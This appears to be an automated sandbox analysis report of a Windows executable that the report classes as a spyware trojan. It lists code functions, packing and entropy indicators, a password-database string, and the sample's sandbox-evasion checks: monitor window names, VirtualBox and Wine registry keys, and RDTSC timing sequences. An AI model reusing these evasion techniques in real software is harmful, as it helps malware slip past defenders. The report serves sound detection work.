Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001198ED	0_2_001198ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C6E97	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E7900	0_2_000E7900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015B905	0_2_0015B905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B5910	0_2_000B5910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013F90F	0_2_0013F90F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D5920	0_2_000D5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00152958	0_2_00152958
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00120942	0_2_00120942
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011D976	0_2_0011D976
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D297F	0_2_000D297F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00139981	0_2_00139981
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B8990	0_2_000B8990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015F98A	0_2_0015F98A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001489B1	0_2_001489B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001419B8	0_2_001419B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001679B9	0_2_001679B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001569C9	0_2_001569C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002639CC	0_2_002639CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001229F8	0_2_001229F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001219F9	0_2_001219F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002709D5	0_2_002709D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014D9E7	0_2_0014D9E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001599E1	0_2_001599E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001279E7	0_2_001279E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014A9EB	0_2_0014A9EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D3A00	0_2_000D3A00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00130A3E	0_2_00130A3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011EA3F	0_2_0011EA3F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011AA21	0_2_0011AA21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CBA48	0_2_000CBA48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C4A40	0_2_000C4A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00132A5C	0_2_00132A5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BCA54	0_2_000BCA54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024EA41	0_2_0024EA41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00116A7F	0_2_00116A7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012AA6E	0_2_0012AA6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DBA8D	0_2_000DBA8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00134A87	0_2_00134A87
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ECAC0	0_2_000ECAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C5ADC	0_2_000C5ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00110B18	0_2_00110B18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00144B19	0_2_00144B19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00275B35	0_2_00275B35
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C1B1B	0_2_000C1B1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013BB0B	0_2_0013BB0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00151B0C	0_2_00151B0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00131B08	0_2_00131B08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00139B30	0_2_00139B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00111B52	0_2_00111B52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013CB5E	0_2_0013CB5E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CCB5A	0_2_000CCB5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012BB48	0_2_0012BB48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011AB7A	0_2_0011AB7A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012DB6E	0_2_0012DB6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012CB95	0_2_0012CB95
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00160B84	0_2_00160B84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012FBA3	0_2_0012FBA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015BBA6	0_2_0015BBA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00136BA4	0_2_00136BA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014CBD0	0_2_0014CBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014FBD9	0_2_0014FBD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027ABF6	0_2_0027ABF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011CBC0	0_2_0011CBC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00115BCC	0_2_00115BCC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00129BF3	0_2_00129BF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C8C1E	0_2_000C8C1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00140C07	0_2_00140C07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C9C10	0_2_000C9C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00116C35	0_2_00116C35
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CDC20	0_2_000CDC20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013CC22	0_2_0013CC22
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00145C21	0_2_00145C21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00165C2F	0_2_00165C2F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00132C28	0_2_00132C28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E4C4D	0_2_000E4C4D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00122C5D	0_2_00122C5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00166C4C	0_2_00166C4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011BC4A	0_2_0011BC4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013EC71	0_2_0013EC71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00112C61	0_2_00112C61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00155C67	0_2_00155C67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D7C9D	0_2_000D7C9D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011DC8D	0_2_0011DC8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013ACB6	0_2_0013ACB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001BECB1	0_2_001BECB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00164CA1	0_2_00164CA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001D2CFC	0_2_001D2CFC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ECCE0	0_2_000ECCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00150CFB	0_2_00150CFB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00152CE5	0_2_00152CE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00120CE3	0_2_00120CE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D2CF8	0_2_000D2CF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00157D13	0_2_00157D13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00147D07	0_2_00147D07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00162D37	0_2_00162D37
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013CD37	0_2_0013CD37
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D3D30	0_2_000D3D30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011CD5C	0_2_0011CD5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00125D74	0_2_00125D74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ECD60	0_2_000ECD60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00143D65	0_2_00143D65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D4D70	0_2_000D4D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00149DB3	0_2_00149DB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00121DA5	0_2_00121DA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00130DAE	0_2_00130DAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00122DC2	0_2_00122DC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00137DEC	0_2_00137DEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CAE00	0_2_000CAE00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ECE00	0_2_000ECE00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015DE38	0_2_0015DE38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00141E2E	0_2_00141E2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D3E30	0_2_000D3E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015CE56	0_2_0015CE56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D3E4B	0_2_000D3E4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CDE40	0_2_000CDE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014EE59	0_2_0014EE59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00161E59	0_2_00161E59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00134E4E	0_2_00134E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015FE4A	0_2_0015FE4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013FE72	0_2_0013FE72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B5E60	0_2_000B5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012EE64	0_2_0012EE64
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014DE68	0_2_0014DE68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015BE68	0_2_0015BE68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00124E6D	0_2_00124E6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001F1E9F	0_2_001F1E9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00114E95	0_2_00114E95
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00112E8B	0_2_00112E8B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C6E97	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B2EA0	0_2_000B2EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014AEBF	0_2_0014AEBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D6EBE	0_2_000D6EBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00136ED1	0_2_00136ED1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00115ECD	0_2_00115ECD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00126EF8	0_2_00126EF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C5EE0	0_2_000C5EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00160EE3	0_2_00160EE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012FF11	0_2_0012FF11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C4F08	0_2_000C4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011AF01	0_2_0011AF01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012CF3F	0_2_0012CF3F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CEF30	0_2_000CEF30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026EF1B	0_2_0026EF1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012DF50	0_2_0012DF50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00111F59	0_2_00111F59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00139F58	0_2_00139F58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D8F5D	0_2_000D8F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00131F7B	0_2_00131F7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D5F7D	0_2_000D5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011FF91	0_2_0011FF91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00128F93	0_2_00128F93
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00132FB3	0_2_00132FB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C8FAD	0_2_000C8FAD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015EFB1	0_2_0015EFB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00154FA4	0_2_00154FA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00156FA3	0_2_00156FA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDFB0	0_2_000EDFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00140FC4	0_2_00140FC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012BFCA	0_2_0012BFCA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013DFCC	0_2_0013DFCC

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 000B8000 appears 55 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 000C4A30 appears 76 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9975197339965398
Source: file.exe	Static PE information: Section: bewqqxki ZLIB complexity 0.99474094643944

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E0A6C CoCreateInstance,

0_2_000E0A6C

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2213378420.0000000005918000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190780011.00000000058F5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1846272 > 1048576

Source: file.exe

Static PE information: Raw size of bewqqxki is bigger than: 0x100000 < 0x19ac00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bewqqxki:EW;foqowxur:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bewqqxki:EW;foqowxur:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d16cb should be: 0x1c4889

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: bewqqxki
Source: file.exe	Static PE information: section name: foqowxur
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0010A276 push ebx; mov dword ptr [esp], edx	0_2_0010A4BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00109BDD push ecx; mov dword ptr [esp], 6EE7D6BAh	0_2_0010A519
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0010E013 push 02C1C67Fh; mov dword ptr [esp], ebp	0_2_0010E025
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edx; mov dword ptr [esp], ecx	0_2_00274046
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 3EDD1B3Fh; mov dword ptr [esp], edx	0_2_00274083
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edx; mov dword ptr [esp], edi	0_2_002740BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push esi; mov dword ptr [esp], eax	0_2_00274164
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 7F825E88h; mov dword ptr [esp], edi	0_2_002741B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edx; mov dword ptr [esp], 57CB1161h	0_2_002742B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ecx; mov dword ptr [esp], edx	0_2_002743E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edi; mov dword ptr [esp], 3B8580A8h	0_2_00274495
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebp; mov dword ptr [esp], eax	0_2_002744A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 3C5849DDh; mov dword ptr [esp], esi	0_2_002744C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebx; mov dword ptr [esp], edi	0_2_00274517
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ecx; mov dword ptr [esp], 731F5D72h	0_2_0027454F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edx; mov dword ptr [esp], ecx	0_2_00274609
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push esi; mov dword ptr [esp], ebp	0_2_00274632
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebp; mov dword ptr [esp], 7064C796h	0_2_00274641
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 763BA314h; mov dword ptr [esp], edi	0_2_0027466F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push edx; mov dword ptr [esp], eax	0_2_0027471B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ecx; mov dword ptr [esp], 77FB9F81h	0_2_00274746
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 13A358A1h; mov dword ptr [esp], ebx	0_2_0027475C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebp; mov dword ptr [esp], 05FBFABAh	0_2_00274761
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 3A2ED171h; mov dword ptr [esp], esi	0_2_002747C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 2F7F7831h; mov dword ptr [esp], ebp	0_2_0027481C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 04AA5ADBh; mov dword ptr [esp], ebp	0_2_00274859
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebx; mov dword ptr [esp], edx	0_2_0027485D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push ebx; mov dword ptr [esp], esi	0_2_00274866
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push esi; mov dword ptr [esp], 7DFBEC60h	0_2_002748D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push eax; mov dword ptr [esp], ecx	0_2_002748EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023 push 6C242860h; mov dword ptr [esp], edi	0_2_002748F6

Source: file.exe	Static PE information: section name: entropy: 7.980056988548206
Source: file.exe	Static PE information: section name: bewqqxki entropy: 7.953902804253043

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2864EE second address: 286512 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA93CFE6D5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA93CFE6D62h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26CE73 second address: 26CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26CE87 second address: 26CE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26CE8B second address: 26CE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26CE91 second address: 26CE9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 285879 second address: 28587D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28587D second address: 2858A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA93CFE6D69h 0x0000000c jmp 00007FA93CFE6D63h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2858A0 second address: 2858A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2858A4 second address: 2858A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 285B82 second address: 285B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 285B86 second address: 285B98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA93CFE6D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA93CFE6D56h 0x00000012 rdtsc
